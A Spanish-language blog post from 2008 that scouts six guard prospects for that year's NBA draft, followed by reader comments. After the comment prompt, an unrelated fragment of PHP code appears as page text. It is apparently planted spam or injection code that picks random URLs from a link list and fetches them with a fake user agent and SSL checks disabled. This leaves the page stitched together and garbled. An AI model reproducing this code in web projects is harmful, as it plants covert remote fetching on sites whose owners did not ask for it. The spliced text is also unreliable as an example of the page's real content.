Draft 2008. Análisis de los mejores Guards

14 de June de 2008 por Dantley

Con el draft a la vuelta de la esquina – Nueva York, 26 de junio-, iniciamos una serie de tres artículos en los que presentaremos a los jugadores que potencialmente pueden entrar en el top-10 de este año. Comenzamos sin más dilación por los Guards

Derrick Rose. 19 años. 1’90m.

El base de Memphis encabeza la mayoría de los mock drafts de este año. Y no es por casualidad. Rose está dotado de una combinación de velocidad –tanto de piernas como de ejecución- y talento que le puede llevar a ser fácilmente el jugador con más potencial de ser una superestrella de todo el draft 2008. Sus estadísticas no dicen mucho de su potencial. Este año en casi 30 minutos, ha promediado 15 puntos, 5 asistencias y 4.5 rebotes. Quizá lo más positivo de esas estadísticas es que siendo claramente el jugador más capaz de su equipo, ha tenido la madurez suficiente para mantener a sus compañeros dentro del juego. Especialmente fructífera ha sido su asociación con Chris Douglas-Roberts.

Es complicado encontrar un equivalente a Derrick Rose en la NBA. Forzando la comparación, podría decirse que Rose tiene el potencial de ser un Dwayne Wade con más capacidad para dirigir al equipo. Cierto que a estas alturas, Derrick todavía tiene mucho que aprender en el puesto de base, pero tiene todas las herramientas en su poder para ser uno de los tres mejores bases de la NBA en los próximos años.

Rose tendrá una buena primera temporada, pero sería una sorpresa que alcanzara los niveles que Chris Paul o Deron Williams alcanzaron el primer año –que a su vez, fueron realmente sorprendentes. Con sólo un año de college a sus espaldas, son muchas las áreas de mejora. La visión de juego en estático, la defensa y el tiro son las principales cuestiones. La defensa es simplemente cuestión de tiempo dado que la actitud, el cuerpo y la rapidez vienen de serie con Rose. Más interrogantes presenta su tiro y su juego en estático.

En resumen, Derrick Rose es de esos pocos candidatos que salen cada año sobre los que una franquicia puede construir su futuro. Chicago o Memphis será su destino.

O.J. Mayo. 20 años. 1’93m.

O.J. Mayo es un nombre que, pese a la juventud de su dueño, resulta familiar a los seguidores de los candidatos a futuras estrellas de la NBA. Tras LeBron James, Mayo ha sido siempre la mayor esperanza de superestrella proveniente del high school incluso por encima de Greg Oden. Sin embargo, su primer –y único- año universitario no ha respondido a las expectativas. Cierto que en un año en el que ha levantado dudas, ha sido capaz de promediar 20 puntos, pero no ha demostrado ser un líder en su equipo de la USC. Sus estadísticas revelan una selección de tiro cuando menos cuestionable y cierta tendencia a la pérdida de balones.

También se ha generado cierta ambigüedad en cuanto a cual es su posición en la NBA. Como base tiene una distribución de juego poco fluida –más por egoísmo que no por calidad- y como escolta le pueden faltar centímetros, aunque hay ejemplos de escoltas exitosos en la NBA con un buen puñado de centímetros menos.

Para completar el panorama negativo, la actitud de Mayo no pasará a la historia como ejemplo para futuras generaciones. En realidad, sólo han sido dos incidentes, una pelea estudiantil y una acusación de haber recibido dinero, pero es lo suficiente para tener este aspecto en cuenta.

Entonces, con tantos aspectos negativos, ¿por qué sigue siendo un candidato a ser drafteado entre el tercer y el sexto pick? La respuesta es fácil: talento. A espuertas. Su uno contra uno y su capacidad para buscarse sus propios tiros no tienen parangón en este draft, quizá sólo con Beasley como rival en este aspecto. Posee además un buen tiro, incluso de 7 metros, que de mejorar su selección de tiro podría llevarle a ser un anotador muy eficiente. Finalmente, debemos citar sus ganas de jugar baloncesto. Vive los partidos muy intensamente, a veces quizá demasiado intensamente y demasiado desde su propio punto de vista.

Sus aspectos negativos le apartan de la lucha por el 1 del draft ante la mayor seguridad que parecen ofrecer Beasley y Rose, pero su talento y potencial puede que con el paso del tiempo le conviertan en el mejor jugador del draft.

Jerryd Bayless. 19 años. 1’90m.

En los últimos años, los jugadores con mentalidad de 2 y cuerpo y velocidad de 1 han sido habituales en los drafts y han tenido cierto éxito en la NBA. Gente tan diversa como Wade, Arenas, Ben Gordon o Monta Ellis han sido “escoltas con licencia para tener el balón”, algunos más formalmente como bases, otros con algún base puro a su lado. El equipo que draftee a Bayless estará buscando eso mismo, un exterior que pueda romper las defensas más que un base clásico distribuidor. Probablemente la razón es más bien práctica, el base pasador es una especie en peligro de extinción con lo cual es más productivo buscar bases anotadores.

Bayless tiene una velocidad letal. Son espectaculares sus entradas a canasta metiéndose en la boca del lobo y ganando el espacio por velocidad y salto. Gran parte de sus 20 puntos por partido provienen de penetraciones, ayudado por un efectivo tiro que obliga a sus defensores a no dejarle espacios. En defensa aprovecha menos su salto quizá por falta de colocación para el rebote, aunque su velocidad lateral y su buena disposición le hace ser un potencial buen defensor.

Será interesante ver como evoluciona Bayless. En la NBA será necesario que desarrolle un mayor repertorio de movimientos de ataque y que mejore su distribución de juego. Un escalón por debajo del talento que aportan gente como Mayo, aún así, Bayless debe tener un sitio entre los mejores de este draft.

Eric Gordon. 19 años. 1’90m.

Otro guard pequeño que añadimos a la lista. Pero a diferencia de O.J. Mayo o incluso de Bayless, Eric Gordon no tiene la capacidad de probar en el puesto de base. Por tanto, el equipo que se lleve al explosivo jugador de Indiana, sabe que contará con un gran jugador al que le falta cuerpo para jugar de escolta. Algunos sobreviven a dicha limitación –Iverson, Monta Ellis, Ben Gordon-, y otros, la mayoría, acaban de relleno de banquillo o en ligas europeas donde a veces se convierten en grandes estrellas.

En cualquier caso, sería injusto pensar que el techo de Eric Gordon sea ganar la Euroliga con el CSKA de Moscú. Gordon tiene cualidades que al menos le permiten mantener la esperanza de tener una carrera exitosa en la NBA. 21 puntos por partido es su estadística más contundente, especialmente viniendo de un jugador de primer año. Su repertorio de formas de anotar es extenso. Atléticamente tiene una magnífico nivel que le hace ser capaz de meter tiros fáciles bajo canasta y forzar faltas personales. Puede mejorar su tiro, especialmente su tiro de tres, pero da la sensación de ser más un problema de selección que de mecánica.

En su contra tiene demasiadas pérdidas, 3 por partido, una cifra muy elevada para un escolta. En defensa aplica su potencia física pero sufre ante shooting guards de más peso. Defiende mejor al base que al escolta. Tampoco, pese a su buena potencia de salto, ayuda en el rebote.

Un jugador relativamente unidimensional, Eric Gordon tiene un arsenal en ataque suficiente como para que los equipos que necesiten anotación se fijen en él en las posiciones nobles del draft.

Russell Westbrook. 19 años. 1’90m.

Seguimos presentando a los mejores guards del draft 2008. Con Russell Westbrook podríamos empezar exactamente igual que lo hemos hecho con Eric Gordon. Westbrook es un escolta pequeño que tendrá esa limitación en su salto a la NBA. Sin embargo, el paralelismo con Eric Gordon acaba ahí. Westbrook es todo explosividad. De hecho, no sería extraño verlo en algún concurso de mates en el futuro. El jugador de UCLA es, probablemente, el mejor defensor exterior de todo el draft. Sin llegar a ser excelente, es un buen pasador -4 asistencias por partido- y, sobre todo, un jugador muy de equipo.

No obstante, no todo es positivo en Westbrook. Su tiro es muy pobre, lo que permite a sus defensores darle distancia. Tiene dificultades para fabricarse su propio tiro. También es cierto que con Collison y Love, Westbrook ha sabido asumir su papel de tercera opción de ataque. Y aunque puede jugar circunstancialmente de base, su manejo de balón le llega muy justo.

Draftear entre los 10 primeros a un jugador que difícilmente pasará de ser complementario puede ser una decisión equivocada. Cierto es que Westbrook está más hecho que la mayoría de los candidatos a lotería, pero su techo es relativamente bajo. Las estrategias y la aversión al riesgo de los GM decidirán su posición final.

D.J. Augustin. 20 años. 1’80m.

Cerramos el análisis de los mejores guards con, al fin, un base puro. Augustin es el contrapunto a los otros candidatos analizados. Sin dejar de ser un gran anotador -19 puntos en su segundo año-, el base de Texas tiene como mejor virtud la capacidad de movilizar a su equipo. El año anterior promedió casi 7 asistencias por partido, bajando algo en el presente año motivado por las mayores responsabilidades que ha tenido en la faceta anotadora ante la ausencia de Kevin Durant.

Base cerebral, parece tener controlado el partido en todo momento, aunque a veces abusa del tiro de tres. También peca en ocasiones de demasiada posesión de balón, lo que le lleva a perder demasiados balones. Su actitud defensiva es buena, pero es justo ahí donde tendrá su mayor inconveniente en la NBA.

El reciente éxito de bases relativamente pequeños como Chris Paul le puede hacer subir posiciones. D.J. está lejos del fenomenal jugador de New Orleans en cuanto a velocidad de ejecución y defensa, pero en equipos que necesiten a un base que sepa llevar a sus compañeros, Augustin puede encontrar su sitio.

Comenta

3 comentarios a esta entrada

  1. planetbasket.net dice:
    #1
  2. Viva_Dirk dice:
    #2

    Westbrook rindió muy bien en la final four, pero por talento y capacidad de mejora hay al menos 15 jugadores por encima suyo; le vendria bien a un equipo que este casi hecho como Toronto en la posición 17 o Phoenix en la posición 15.

      Citar

  3. Dantley dice:
    #3

    Sí, Westbrook lo que tiene es que es una bestia, pero personalmente creo que sería un error desperdiciar un top-10 en alguien que sabes que no da para mucho más, aunque en defensa puede aportar como un buen especialista. Chris Douglas-Roberts por ejemplo, tiene más baloncesto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>